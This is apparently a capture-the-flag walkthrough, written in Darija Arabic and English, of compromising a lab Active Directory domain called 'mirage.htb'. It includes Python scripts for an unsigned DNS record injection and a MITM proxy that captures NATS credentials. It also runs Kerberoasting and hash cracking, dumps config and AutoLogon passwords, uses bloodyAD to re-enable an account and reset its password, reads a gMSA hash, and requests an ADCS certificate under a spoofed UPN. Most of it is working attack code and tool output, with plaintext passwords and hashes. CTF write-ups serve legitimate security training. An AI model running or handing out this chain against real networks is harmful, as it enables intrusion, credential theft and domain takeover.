OS:SCAN(V=7.95%E=4%D=7/20%OT=53%CT=1%CU=41372%PV=Y%DS=2%DC=T%G=Y%TM=687C263
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%TS=A)SEQ(SP=1
OS:05%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=105%GCD=1%ISR=10D%TI=I%
OS:CI=I%II=I%SS=S%TS=A)SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=A)SE
OS:Q(SP=109%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M552NW8ST11%O2=M5
OS:52NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)
Uptime guess: 0.099 days (since Sat Jul 19 21:49:31 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 55724/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46309/tcp): CLEAN (Couldn't connect)
| Check 3 (port 42844/udp): CLEAN (Timeout)
| Check 4 (port 46560/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-20T06:11:16
|_ start_date: N/A
|_clock-skew: 6h59m58s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 51.51 ms 10.10.14.1 (10.10.14.1)
2 54.34 ms 10.129.60.250 (10.129.60.250)
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 20 00:11:55 2025 -- 1 IP address (1 host up) scanned in 225.66 seconds
- AD services:
88,389,445 - DNS:
53 - NFS:
2049(غريبة شوية في Windows) - NATS server:
4222 - WinRM:
5985(للتحكم عن بعد فـ Windows)
🎯 الملاحظة المهمّة: NFS + DNS = احتمال نلقاو ملفات حساسة أو نستغلّو التوجيه.
NSF Mounts
➜ Mirage showmount -e 10.129.60.250
Export list for 10.129.60.250:
/MirageReports (everyone)
بأبسط showmount, قدرنا نكتشف بلي السيرفر مشارك فولدر /MirageReports على البروتوكول NFS.
وهاد الشي معناه أي واحد يقدر يركبو وياخذ وش فيه — يعني خطأ أمني واضح
➜ Mirage sudo mount -t nfs 10.129.60.250:/MirageReports /mnt
➜ Mirage sudo cp /mnt/* ./
➜ Mirage ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf mirage.htb_ips.txt mirage.nmap passwords.txt users.txt
ركبنا المشاركة:
, الملفات اللي لقيناهم:
Incident_Report_Missing_DNS_Record_nats-svc.pdfMirage_Authentication_Hardening_Report.pdf
هاد الوثائق ظاهر فيهم معلومات داخلية، غالباً فيهم تراك للمرحلة الجاية.
خلينا نفتحوهم ونشوفو واش نقدرو نطلعو منهم.
في هاد التحدي، واحد من الـ PDFات فيه تقرير على DNS record مفقود (Missing DNS Record)، وهاد النقطة هي المفتاح.
اللي صاير هو كالتالي:
الفكرة العامة:
السيرفر يستعمل DNS داخلي باش يوصل لخدمة اسمها مثلاً:nats-svc.mirage.htb
لكن في السياق، ماكانش تعريف لهذا الـ DNS فـ /etc/hosts، ولا فـ DNS الخارجي.
السيرفر كي يحاول يحل الإسم، يخرج يبحث برا (عبر الشبكة) — وهنا تقدر إنت ترد عليه بإجابة مزوّرة!
واش استغلّينا بالضبط؟
- السيرفر يعتمد على DNS lookup لخدمة معيّنة.
- مافيش record رسمي، يعني إنت تقدر تـ spoof الـ DNS request.
- وكي ترد عليه، يثق فيك ويدير request عندك.
- وقتها تقدر ترد عليه بملف config، أو تعطيه payload (مثلاً فيه credentials أو path فيه shell).
الأدوات اللي نحتاجوها:
- نربط أداة Fake DNS Server (مثلاً
dnschefأوresponderأو حتىdig + named.conf) - نخلي الآلة الضحية تجي تسقسي، وإحنا نجاوبوها بلي السيرفر راهو في IP متحكَّم فيه (عندنا)
- ومن تما، ندخلو فـ استغلال الخدمة (مثلاً web interface، أو SSH config…)
import dns.update
import dns.query
import dns.tsigkeyring
import dns.resolver
# Target DNS server and domain
dns_server = '10.129.105.223'
domain = 'mirage.htb.'
record = 'nats-svc'
ip = '10.10.14.39'
# Build the update request
update = dns.update.Update(domain) # No TSIG, completely unsigned
update.add(record, 300, 'A', ip)
# Send it
response = dns.query.tcp(update, dns_server)
print("Response:")
print(response)واش راه صاري هنا؟
- السيرفر المستهدف فيه DNS داخلي (
10.129.105.223) - تسجّل داخلو record جديد (بدون توقيع أمني)
- تضيف A record اسمو
nats-svc.mirage.htbيوجه للـ IP ديالك (10.10.14.39)
: أي برنامج داخل السيرفر كي يحاول ي resolve nats-svc.mirage.htb، يطيح على الآي بي ديالك.
MITM Proxy على بورت 4222 (NATS)
import socket
import threading
# Local proxy server binds here
LISTEN_HOST = '0.0.0.0'
LISTEN_PORT = 4222
# Real NATS server
REAL_HOST = '10.129.105.223'
REAL_PORT = 4222
def handle_client(client_sock):
# Connect to real NATS server
remote_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_sock.connect((REAL_HOST, REAL_PORT))
def forward(src, dst):
while True:
try:
data = src.recv(4096)
if not data:
break
print(f"[DATA] {data.decode(errors='ignore')}")
dst.sendall(data)
except Exception as e:
break
src.close()
dst.close()
threading.Thread(target=forward, args=(client_sock, remote_sock)).start()
threading.Thread(target=forward, args=(remote_sock, client_sock)).start()
def start_proxy():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((LISTEN_HOST, LISTEN_PORT))
server.listen(5)
print(f"[+] Proxy listening on {LISTEN_HOST}:{LISTEN_PORT}")
while True:
client_sock, addr = server.accept()
print(f"[+] Connection from {addr}")
threading.Thread(target=handle_client, args=(client_sock,)).start()
if __name__ == "__main__":
start_proxy()الفكرة:
- تفتح socket على جهازك في البورت
4222(نفس البورت اللي تستعملو خدمة NATS) - كي يجي السيرفر يحاول يتصل بـ
nats-svc.mirage.htb:4222(بعد ما DNS صاير يشير ليك)، راهو يطيح عندك - البرنامج تاعك يـ يعيد توجيه الترافيك بين الضحية والسيرفر الحقيقي (proxy)
- وفنفس الوقت، يـ يطبع الترافيك باش تقدر تشوف كريديان، أو secrets
➜ Mirage python proxy.py
[+] Proxy listening on 0.0.0.0:4222
[+] Connection from ('10.129.60.250', 62791)
[DATA] INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":304,"client_ip":"10.10.14.2","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
[DATA] CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5***********337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
واش شفنا فالـ traffic؟
Credentials واضحة على طبق من ذهب:
- 👤 Username:
Dev_Account_A - 🔐 Password:
hx5***********337!(كاملة عندك فالحقيقة)
واش معناها هادشي؟
السيرفر كي يتصل بالخدمة (NATS) يرسل credentials بلا تشفير
وانت، بما أنك ديرت MITM (Man-in-the-middle) على DNS، قدرت تشوفهم.
وهنا يجينا سؤال:
فين نقدرو نستعمل هاد الـ user/pass؟
غالباً، هذي الكريديان:
- يتعاودو فـ أنظمة أخرى (SSH, Web interface, DB…)
- أو يكون عندهم صلاحيات مباشرة على الـ system
➜ Mirage nats stream ls -s 'nats://Dev_Account_A:hx5**********337!@10.129.221.101:4222'
╭─────────────────────────────────────────────────────────────────────────────────╮
│ Streams │
├───────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name │ Description │ Created │ Messages │ Size │ Last Message │
├───────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ auth_logs │ │ 2025-05-05 08:18:19 │ 5 │ 570 B │ 76d1h47m20s │
╰───────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯
➜ Mirage nats stream info auth_logs -s 'nats://Dev_Account_A:hx5h7F5554fP@1337!@10.129.221.101'
Information for Stream auth_logs created 2025-05-05 08:18:19
Subjects: logs.auth
Replicas: 1
Storage: File
Options:
Retention: Limits
Acknowledgments: true
Discard Policy: New
Duplicate Window: 2m0s
Direct Get: true
Allows Msg Delete: false
Allows Purge: false
Allows Rollups: false
Limits:
Maximum Messages: 100
Maximum Per Subject: unlimited
Maximum Bytes: 1.0 MiB
Maximum Age: unlimited
Maximum Message Size: unlimited
Maximum Consumers: unlimited
Metadata:
_nats.level: 1
_nats.req.level: 0
_nats.ver: 2.11.3
State:
Messages: 5
Bytes: 570 B
First Sequence: 1 @ 2025-05-05 08:18:56 UTC
Last Sequence: 5 @ 2025-05-05 08:19:27 UTC
Active Consumers: 0
Number of Subjects: 1
➜ Mirage nats stream get auth_logs --last-for logs.auth -s 'nats://Dev_Account_A:hx5h7F5554fP@1337!@10.129.221.101:4222'
Item: auth_logs#5 received 2025-05-05 07:19:27.2106658 +0000 UTC on Subject logs.auth
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
➜ Mirage nxc ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --users
LDAP dc01.mirage.htb 389 DC01 [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP dc01.mirage.htb 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP dc01.mirage.htb 389 DC01 [*] Enumerated 10 domain users: mirage.htb
LDAP dc01.mirage.htb 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP dc01.mirage.htb 389 DC01 Administrator 2025-06-23 22:18:18 0 Built-in account for administering the computer/domain
LDAP dc01.mirage.htb 389 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP dc01.mirage.htb 389 DC01 krbtgt 2025-05-01 08:42:23 0 Key Distribution Center Service Account
LDAP dc01.mirage.htb 389 DC01 Dev_Account_A 2025-05-27 15:05:12 0
LDAP dc01.mirage.htb 389 DC01 Dev_Account_B 2025-05-02 09:28:11 1
LDAP dc01.mirage.htb 389 DC01 david.jjackson 2025-05-02 09:29:50 0
LDAP dc01.mirage.htb 389 DC01 javier.mmarshall 2025-05-25 19:44:43 0 Contoso Contractors
LDAP dc01.mirage.htb 389 DC01 mark.bbond 2025-06-23 22:18:18 0
LDAP dc01.mirage.htb 389 DC01 nathan.aadam 2025-06-23 22:18:18 0
LDAP dc01.mirage.htb 389 DC01 svc_mirage 2025-05-22 21:37:45 0 Old service account migrated by contractors ➜ Mirage impacket-GetUserSPNs 'mirage.htb/david.jjackson:pN8kQmn6b86!1234@' -dc-ip 10.129.221.101 -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ ------------ ------------------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/exchange.mirage.htb nathan.aadam CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb 2025-06-23 22:18:18.584667 2025-07-04 21:01:43.511763
[-] CCache file is not found. Skipping...
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$4e436f77918a8ad94985d03da3b0713c$66fd3687224a23430ea453052f3cff71a544bd316f568ad9ad39bb34fc038759a92866d50f3c852ce73c7d13742f1c71a40a1dbb8fbadb683ea8d4a46f2fc6a45725d39f40ae489056224eb16cb1029aeceb17f1e3a9ae02819b53f2456018132db5ca8307099e1f6bef1df2bff3c8159c8eea240da2456213d2cc3c4f9edc36a9712b8b283e1da0c0858ad35780d6adfd1d5bcd3d8e02c498530f93e1fdd778ce7a662644e9cd7fe95659d8e2f825cf31b164c764cd5e1027c7414617dd65485b3e62b6d61ade6bac8757ea0c9bb77d399f21c084d17979315ed7b286baf8210d5879e7086c7b62c5a49746de5ba5d95fe048f68506cda38d05afec58ecd1d06555ce1186501c290003e05f3104300de351e302055ede7e22b1ccfdd307245f950c390f84d959ad9825df379d8e33ba57e07c857a7c1861f64f1cfcda6b36e4b19cfceac59107b9df17b4dbcb8553725fff6c7e9a058c311cc0cb6e45dad9a0a68b9b5a22b28c709d52d4b2b85fc9935fe22af1b5712689c1925045583bcbdfea640b25a40cc0a8206185827aa6b1a76329a566c35135c86992ddbba7adee72cbc480abe45d376a9bb74f5e88c7e8bff30740bed3293aacab911de0eab701a68288b5a3da3869e248c744c56effd99a5d5e70d26fea2ea5d5bba6852bdeb0a5f7beac570798bb07a0c47b1accd80477b58fbb51c00783ac38e0afe91084a65ab6080fafaff1965d723394fa1ea77a90f6508494e1aefdf3c18a3797607dd4f555d6f288a9b8131811c07c103cbb910b1e69fdab5d4a98fc8e0e4a9e4c40f12d914d094ff3877bcb0682c34c21924ac1244d60a1ec9efb2c5e575ccca4b9bba1e4f28b7e2844ef8b062a57c618ba728a7bb2a9d486eb975257876d4e37eefd36a204b6c968f7bbc718fddb70b728da18e31882fc7fff2d5dfa75098b35f86062b5e984b7d7387a7064d600381a4656ff77906374716b942e00fc481a08da76ceb7f6da16fd69a74b73937a07618fe7fd65e26954ed0ef5d6d0ae01cded2462053afa31cb6fb29ec477fb29b8b85fe5be46254f24af2ed39f1b15b42dfe1059073c800b4e25206f4cca3719b54834fe51eab29c1728b25cdc38aac38849b9fb0a4dedb8368fb184f59a007d55662dc23720684786dac719327f602f977abdac040a417174bb0061ed6ae418723b4f31aae5fc9a366489836c153fc9a2a5d1592a628b66892c5736fbe78f01cfccdd14d9f35414d8319d52ecda3512ecfbc245895b34a2d963f026544b73d254efc849c15c29b375333dcbbb053f45401848c7d415c6484e6a80754b92be5d39eb11bc1a561f44a232c3d30afc3f076e3e06d13fd23e0c8ea4796248c73fc846cc9a4f72b108335ec27e3a247cb833c6fe396e24ddceeb2c7a3588a84761bc17f0c8c336210e9a4d531d9fc13b95bf6999de82bfed7d0fe9db92ca1c2b9d24b32041b3f38a5857081b8710ba07036a69572e2319c9ab08644b7892a581d514c06c9b5becd4ac89f54bab542e2c62cccdde5e4c7b1ae98df29d62ecbe2d2419bc85963bc8820fa5d598e4e06c61john
➜ Mirage john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3 (?)
1g 0:00:00:04 DONE (2025-07-20 11:01) 0.2288g/s 2853Kp/s 2853Kc/s 2853KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Evil-Winrm
We get user flag here
➜ Mirage evil-winrm -i dc01.mirage.htb -r mirage.htb
*Evil-WinRM* PS C:\temp> ImportModule c:\temp\SharpHound.ps1
*Evil-WinRM* PS C:\temp> Invoke-BloodHound -CollectionMethod All -OutPutDirectory c:\temp -Domain MIRAGE.HTB
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/20/2025 8:56 AM 39887 20250720085615_BloodHound.zip
-a---- 7/20/2025 3:31 AM 51712 RunasCs.exe
-a---- 7/20/2025 8:51 AM 1594261 SharpHound.ps1
-a---- 7/20/2025 3:41 AM 10156032 winPEASany.exe
*Evil-WinRM* PS C:\temp> download 20250720085615_BloodHound.zip
Info: Downloading C:\temp\20250720085615_BloodHound.zip to 20250720085615_BloodHound.zip
Info: Download successful!
winPEAS
*Evil-WinRM* PS C:\Program Files\Nats-Server> cat nats-server.conf
listen: '0.0.0.0:4222'
jetstream: {
store_dir: 'C:\Program Files\Nats-Server\tmp'
}
accounts: {
'$SYS': {
users: [
{ user: 'sysadmin', password: 'bb5M0k5XWIGD' }
]
},
'dev': {
jetstream: true,
users: [
{ user: 'Dev_Account_A', password: 'hx5h7F5554fP@1337!' },
{ user: 'Dev_Account_B', password: 'tvPFGAzdsJfHzbRJ' }
]
}
}
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : MIRAGE
DefaultUserName : mark.bbond
DefaultPassword : 1day@atime
Bloodhound
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb get object 'JAVIER.MMARSHALL'
distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: javier.mmarshall
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-05-22 21:49:20+00:00
description: Contoso Contractors
displayName: javier.mmarshall
givenName: javier.mmarshall
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-05-25 18:43:57.120180+00:00
lastLogonTimestamp: 2025-05-22 21:45:29.508220+00:00
logonCount: 13
logonHours:
memberOf: CN=IT_Contractors,OU=Groups,OU=Contractors,OU=IT_Staff,DC=mirage,DC=htb
msDS-SupportedEncryptionTypes: 0
nTSecurityDescriptor: O:S-1-5-21-2127163471-3824721834-2568365109-512G:S-1-5-21-2127163471-3824721834-2568365109-512D:AI(OD;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OD;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;037088f8-0ae1-11d2-b422-00a0c968f939;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;WP;bf9679ab-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-517)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;0x30;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;0x30;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a54-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a56-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;;S-1-5-11)(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-11)(OA;;RP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;RP;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b2-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0x20014;;;S-1-5-21-2127163471-3824721834-2568365109-2602)(A;;0xf01ff;;;S-1-5-21-2127163471-3824721834-2568365109-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;RC;;;S-1-5-11)(A;;0x20094;;;S-1-5-10)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2127163471-3824721834-2568365109-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2127163471-3824721834-2568365109-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2127163471-3824721834-2568365109-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: javier.mmarshall
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=mirage,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: c52e731b-30c1-439c-a6b9-0c2f804e5f08
objectSid: S-1-5-21-2127163471-3824721834-2568365109-1108
primaryGroupID: 513
pwdLastSet: 2025-07-20 17:38:25.576412+00:00
sAMAccountName: javier.mmarshall
sAMAccountType: 805306368
uSNChanged: 159917
uSNCreated: 24655
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: javier.mmarshall@mirage.htb
whenChanged: 2025-07-20 17:38:25+00:00
whenCreated: 2025-05-02 08:33:11+00:00
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb remove uac "javier.mmarshall" -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from javier.mmarshall's userAccountControl
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb get object 'JAVIER.MMARSHALL' --attr userAccountControl
distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb set password 'javier.mmarshall' 'NewPass123!'
[+] Password changed successfully!PS C:\temp> Set-ADUser -Identity "javier.mmarshall" -Clear logonHours
Set-ADUser -Identity "javier.mmarshall" -Clear logonHours
➜ Mirage nxc smb dc01.mirage.htb -u javier.mmarshall -p 'NewPass123!' -k --generate-tgt javier.mmarshall
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\javier.mmarshall:NewPass123!
SMB dc01.mirage.htb 445 dc01 [+] TGT saved to: javier.mmarshall.ccache
SMB dc01.mirage.htb 445 dc01 [+] Run the following command to use the TGT: export KRB5CCNAME=javier.mmarshall.ccache
28
➜ Mirage bloodyAD -k --host '10.129.28.136' -d 'mirage.htb' -u 'javier.mmarshall' -p 'NewPass123!' --host dc01.mirage.htb get object 'Mirage-Service$' --attr msDS-ManagedPassword
distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866
msDS-ManagedPassword.B64ENCODED: 43A01mr7V2LGukxowctrHCsLubtNUHxw2zYf7l0REqmep3mfMpizCXlvhv0n8SFG/WKSApJsujGp2+unu/xA6F2fLD4H5Oji/mVHYkkf+iwXjf6Z9TbzVkLGELgt/k2PI4rIz600cfYmFq99AN8ZJ9VZQEqRcmQoaRqi51nSfaNRuOVR79CGl/QQcOJv8eV11UgfjwPtx3lHp1cXHIy4UBQu9O0O5W0Qft82GuB3/M7dTM/YiOxkObGdzWweR2k/J+xvj8dsio9QfPb9QxOE18n/ssnlSxEI8BhE7fBliyLGN7x/pw7lqD/dJNzJqZEmBLLVRUbhprzmG29yNSSjog==➜ Mirage impacket-getTGT 'mirage.htb/mirage-service$' -hashes 'aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in mirage-service$.ccache
➜ Mirage certipy-ad account -k -no-pass -target dc01.mirage.htb -dc-ip '10.129.28.136' -user 'mark.bbond' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'mark.bbond':
cn : mark.bbond
distinguishedName : CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
name : mark.bbond
objectSid : S-1-5-21-2127163471-3824721834-2568365109-1109
sAMAccountName : mark.bbond
userPrincipalName : mark.bbond@mirage.htb
userAccountControl : 66048
whenCreated : 2025-05-02T08:36:23+00:00
whenChanged : 2025-07-20T19:07:48+00:00➜ Mirage certipy-ad account -k -no-pass -target dc01.mirage.htb -dc-ip '10.129.28.136' -upn 'DC$@mirage.htb' -user 'mark.bbond' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'mark.bbond':
userPrincipalName : DC$@mirage.htb
[*] Successfully updated 'mark.bbond'➜ Mirage certipy-ad req -k -dc-ip '10.129.28.136' -dc-host dc01.mirage.htb -target 'dc01.mirage.htb' -ca 'mirage-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'DC$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc.pfx'
